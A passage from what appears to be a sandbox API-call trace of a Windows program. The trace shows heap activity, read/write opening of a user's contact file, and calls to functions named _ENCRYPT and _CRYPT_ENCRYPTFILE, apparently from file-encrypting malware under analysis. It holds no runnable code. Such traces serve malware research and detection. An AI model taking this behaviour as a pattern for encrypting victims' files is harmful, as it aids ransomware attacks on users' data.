dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0074.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0074.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0074.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0074.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0074.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.713] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0074.724] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.725] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0074.725] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.725] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0074.725] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0074.725] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0074.725] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.725] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0074.725] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0074.725] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.725] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0074.725] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0074.725] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0074.725] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.725] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0074.725] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.725] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0074.725] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.725] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0074.725] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0074.725] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.726] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0074.726] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.726] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0074.726] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.726] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0074.726] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.726] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0074.726] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0074.727] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696ad0 [0074.727] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.727] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0074.727] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0074.727] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0074.727] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.727] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0074.727] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0074.727] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0074.727] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0074.728] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.728] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0074.728] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0074.728] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0074.728] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0074.728] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.728] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0074.728] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0074.728] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0074.729] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0074.730] FreeLibrary (hLibModule=0x76d30000) returned 1 [0074.730] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0074.730] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0074.730] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0074.730] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0074.731] FreeLibrary (hLibModule=0x76d30000) returned 1 [0074.732] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0074.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0074.732] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0074.732] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0074.732] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.732] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0074.732] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0074.733] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.733] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.733] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.733] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x657690, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 0x6b89b8 [0074.733] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0074.734] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.734] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x657690, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 0x6b89b8 [0074.734] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0074.734] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Contacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tacts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="acts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Administrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dministrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ministrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="inistrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nistrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="istrator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="strator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="trator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ator.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tor.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="or.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0074.736] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.736] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0074.736] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0074.736] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0074.736] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0074.736] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0074.736] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0074.737] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0074.737] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.737] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 0x6b89f8 [0074.737] FindClose (in: 